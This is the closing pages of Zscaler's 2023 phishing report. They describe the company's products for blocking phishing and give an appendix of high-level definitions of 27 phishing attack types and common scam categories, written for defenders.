• Preventing compromise: Full TLS/SSL inspection at scale,

browser isolation, and policy-driven access control to prevent
access to suspicious websites.

• Eliminating lateral movement: Connect users directly to

apps, not the network, to limit the blast radius of a potential
incident.

• Shutting down compromised users and insider threats: If an

attacker gains access to your identity system, the Zero Trust
Exchange prevents private app exploit attempts with inline
inspection and detects the most sophisticated attackers with
integrated deception.

• Stopping data loss: Inspect data-in-motion and at-rest to

prevent potential theft by an active attacker.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 31
 How the Zscaler Zero Trust Exchange™ Can Mitigate Phishing Attacks

Related Zscaler Products Zscaler Deception™ detects and contains attackers attempting
to move laterally or escalate privileges by luring them with decoy
servers, applications, directories, and user accounts.
Zscaler Internet Access™ helps identify and stop malicious activity
by routing and inspecting all internet traffic through the Zero Trust
Exchange. Zscaler blocks:

• URLs and IPs observed in the Zscaler cloud and from natively
integrated open source and commercial threat intel sources.
Your Next Steps
This includes policy-defined, high-risk URL categories Uncover critical risks across your entire public cloud environment
commonly used for phishing, such as newly observed and with the Zscaler Security Risk Assessment. Get a complete cloud
newly activated domains. asset inventory, a clear picture of your public cloud security risks,
an overview of how you’re meeting compliance benchmarks, and
• IPS signatures developed from ThreatLabz analysis of
actionable remediation guidance.
phishing kits and pages.

• Novel phishing sites identified by content scans powered by

AI/ML detection.

Advanced Threat Protection blocks all known C2 domains.

Advanced Firewall extends C2 protection to all ports and protocols,

including emerging C2 destinations.

Browser Isolation creates a safe gap between users and malicious

web categories, rendering content as a stream of picture-perfect
images to eliminate data leakage and the delivery of active threats.

Advanced Cloud Sandbox prevents unknown malware delivered in

second stage payloads.

Zscaler Private Access™ safeguards applications by limiting

lateral movement with least-privileged access, user-to-app
segmentation, and full inline inspection of private app traffic.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 32
About ThreatLabz
ThreatLabz is the security research arm of Zscaler. This world-class team is responsible
for hunting new threats and ensuring that the thousands of organizations using the global
Zscaler platform are always protected. In addition to malware research and behavioral
analysis, team members are involved in the research and development of new prototype
modules for advanced threat protection on the Zscaler platform, and regularly conduct
internal security audits to ensure that Zscaler products and infrastructure meet security
compliance standards. ThreatLabz regularly publishes in-depth analyses of new and
emerging threats on its portal, research.zscaler.com.

Stay updated on ThreatLabz research by subscribing to our Trust Issues newsletter today.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 33
About Zscaler
Zscaler (NASDAQ: ZS) accelerates digital transformation so that customers can be more
agile, efficient, resilient, and secure. The Zscaler Zero Trust Exchange™ protects thousands
of customers from cyberattacks and data loss by securely connecting users, devices, and
applications in any location. Distributed across more than 150 data centers globally, the
SASE-based Zero Trust Exchange is the world’s largest inline cloud security platform.

Learn more at zscaler.com or follow us on Twitter @zscaler.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 34
Appendix
Categorizing Phishing Attacks A to Z: Common Types of Phishing Attacks

Phishing attacks can be categorized in a variety of ways and can 1. Angler phishing: Attackers pose as customer support and
include multiple techniques. However, attackers are adapting their offer to help resolve negative comments about a company
approaches to dupe increasingly savvy users and evade defense posted on social media, targeting dissatisfied customers,
tools. Here, we outline common phishing attack definitions and particularly those of banks.
characteristics.
2. Adversary-in-the-middle (AiTM) phishing: Attackers
The lists here include several descriptions of physical attack imitate an unsuspecting victim’s actions to obtain their login
methods and the threat they pose to organizations. The majority credentials and session cookies.
of this report focuses on virtual phishing threats that require
3. Baiting phishing: Attackers use tempting offers, file names,
an internet connection to carry out. A telltale characteristic of
or devices to entice curious individuals into a trap, similar to
online phishing scams is that they typically request users to
a trojan horse attack.
submit information or download malware via one of the following
methods: 4. Browser-in-the-browser (BiTB) phishing: Attackers display
a malicious browser window within a browser window
• Link: A user clicks on a malicious link to a phishing site,
to imitate a legitimate domain and replicate pop-up login
hosted file, or malware.
windows that appear to be from third-party authentication
• Prompt: A user is prompted to submit sensitive providers.
information, resulting in data theft.
5. CEO fraud or business email compromise (BEC) phishing:
• Attachment: A user opens an attachment that delivers Attackers target company employees using compromised
malicious software. executive accounts to send fake invoices or requests for
payment by wire transfer or other forms.
As you plan what to invest in to reduce phishing incidents this year,
consider the following types of phishing attacks. 6. Chat or IM phishing: Attackers use instant messages to
deliver scams within apps, typically with malicious URL links.

7. Clone phishing: Attackers create duplicate email messages

that appear to be from trusted sources, with slight
modifications and malicious attachments or links.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 35
 Appendix

8. Credential harvesting phishing: Attackers create fake 15. Man-in-the-middle (MiTM) phishing: Attackers target users
login pages or send phishing emails that mimic legitimate of a specific server or system, capturing data in-transit such as
login prompts to steal usernames and passwords from credentials, cookies, or bank account information, by mimicking
unsuspecting victims. online services through proxy servers.

9. Doc clouding phishing: Attackers deliver malicious 16. Pharming or DNS cache phishing: Attackers redirect visitors
documents from common cloud sources like Google Drive, to a malicious site by altering the IP address of a legitimate
Box, or OneDrive to bypass traditional security tools and website in the compromised domain name system (DNS)
make it challenging for most security teams to detect. servers, or by sending a phishing email with malicious code that
redirects the victim to the site when they enter any URL from
10. Email phishing: Attackers send socially engineered email their computer.
messages posing as known brands, with malicious URL
links or attached assets designed to steal information or 17. QR code phishing: Attackers use QR codes that, when scanned
deliver malware. by the victim’s smartphone, lead to malicious websites or
download malware onto the device.
11. Evil twin phishing: Attackers mimic a trusted public Wi-Fi
network to observe victims’ online activity and steal data 18. Ransomware phishing: Attackers send emails with malicious
traversing the malicious access point. attachments or links that, when clicked, download ransomware
onto the victim’s computer and demand payment in exchange
12. HTTPS phishing: Attackers use the encrypted “hypertext for a recovery decryption key.
transfer protocol secure” to deceive trusting users into
clicking on malicious URL links. 19. Reverse tunnel phishing: Attackers use a remote server to
create a reverse SSH tunnel to the victim’s computer, enabling
13. Malvertising phishing: Attackers use scripts in them to exploit the machine for various purposes, such as
advertisements to deliver unwanted content directly to malware installation or sensitive data theft, while remaining
victims’ computers. hidden to avoid detection by the victim.
14. MFA bombing: Attackers trick users with compromised 20. Search engine phishing: Attackers target consumers by creating
credentials into verifying an illegitimate MFA request made fake online shopping websites indexed by search engines.
by the threat actor. These attacks are typically characterized They offer large discounts on featured products, and they may
by a continuous stream of MFA requests, sometimes appear to be seasonal pop-ups or contain fake backdated
accompanied by a fake call, text, or email that tricks the reviews. Victims may unknowingly share personal data, bank
user into unknowingly or accidentally verifying one of information, credit card numbers, or even pay for fake goods.
the requests. Scammers have gone as far as delivering fake shipping and
tracking information and even “cheap token goods” to extend
the life cycle of these sites.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 36
 Appendix

21. Smishing: Attackers use text messages (SMS communications) 27. Whaling: Attackers target executives and high-profile
to deliver scams, typically with malicious URL links. The individuals using publicly available information. They will
message sender appears to be a known brand or the recipient’s either socially engineer the target into revealing confidential
acquaintance. trade secrets that can be used for fraudulent purposes or
trick them into performing another action that the threat
22. Spear phishing: Attackers organize campaigns that use actor can use to achieve their goals.
publicly available information to target individuals working for
specific organizations. These deceptive emails can contain real
information and look like legitimate internal requests to trick
recipients into performing a desired action.

23. Tailgating: Attackers physically gain entry to a restricted area by

following an authorized person with access inside. This attack
form is classified as phishing when someone takes the social
engineering bait (like carrying several large boxes) presented by
the attacker and allows them to enter without verification.

24. USB phishing: Attackers physically plant or send targets USB

drive devices loaded with malicious executables that load when
plugged into any vulnerable endpoint.

25. Vishing: Attackers make malicious phone calls that use social
engineering to pressure recipients into taking an action, like
transferring money or revealing personal information.

26. Watering hole phishing: Attackers target members of

specific groups likely to visit a specific site that the attacker
compromised or created for the purpose of carrying out
the attack.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 37
 Appendix

Phishing cannot be eliminated through technology alone. Government scams impersonate federal agencies like the
Organizations must track the evolution of phishing scams to observe IRS with lures such as fake benefits claims, relief loans, and
how shifts in cultural awareness mitigate specific techniques over overdue payment requests.
time. Understanding the different types of scams can help security
Job offer scams impersonate fake and real companies
professionals educate employees on how to apply a skeptical zero
seeking to hire new employees with lures such as fake job
trust outlook when encountering what may seem like a legitimate
postings, applications, and job offerings.
opportunity, verification request, or push notification. When
developing your own strategy to reduce phishing incidents, consider Push notification or browser scams impersonate web
including the following types of common scams: browser notifications with lures such as fake reminders
to install updates, message alerts, and product
Top Phishing Scam Categories
advertisements.
Cloud scams impersonate file-sharing or cloud storage
services with lures such as fake access requests and account Social media scams impersonate social platforms/users
notifications. with lures such as fake or spoofed accounts, private
messages, account warnings or notifications, and
Consumer scams impersonate e-commerce brands with security alerts.
lures such as fake account notifications and membership or
benefits claims. Technical scams impersonate general services or known
brands with lures such as account notifications, error
Commercial scams impersonate general services like FedEx messages, and software updates.
with lures such as tracking notifications and payment
requests.

Corporate scams impersonate specific companies with lures

such as fake account notifications, company updates, HR
tasks, and invoice payment requests.

Dating scams impersonate people seeking to date through

an online platform with lures such as fake profiles, messages,
likes, and follows.

Financial services scams impersonate known financial

institutions targeting individuals with lures such as fake
account notifications or security alerts.

© 2023 Zscaler, Inc. All rights reserved. Zscaler ThreatLabz 2023 Phishing Report 38
About Zscaler
Zscaler (NASDAQ: ZS) accelerates digital transformation so that customers can be more agile, efficient, resilient, and secure. The © 2023 Zscaler, Inc. All rights reserved. Zscaler™, Zero Trust Exchange™, Zscaler
Internet Access™, ZIA™, Zscaler Private Access™, ZPA™ and other trademarks listed
Zscaler Zero Trust Exchange™ protects thousands of customers from cyberattacks and data loss by securely connecting users, at zscaler.com/legal/trademarks are either (i) registered trademarks or service marks
devices, and applications in any location. Distributed across more than 150 data centers globally, the SASE–based Zero Trust or (ii) trademarks or service marks of Zscaler, Inc. in the United States and/or other
countries. Any other trademarks are the properties of their respective owners.
Exchange is the world’s largest inline cloud security platform. To learn more, visit www.zscaler.com.

+1 408.533.0288 Zscaler, Inc. (HQ) • 120 Holger Way • San Jose, CA 95134 zscaler.com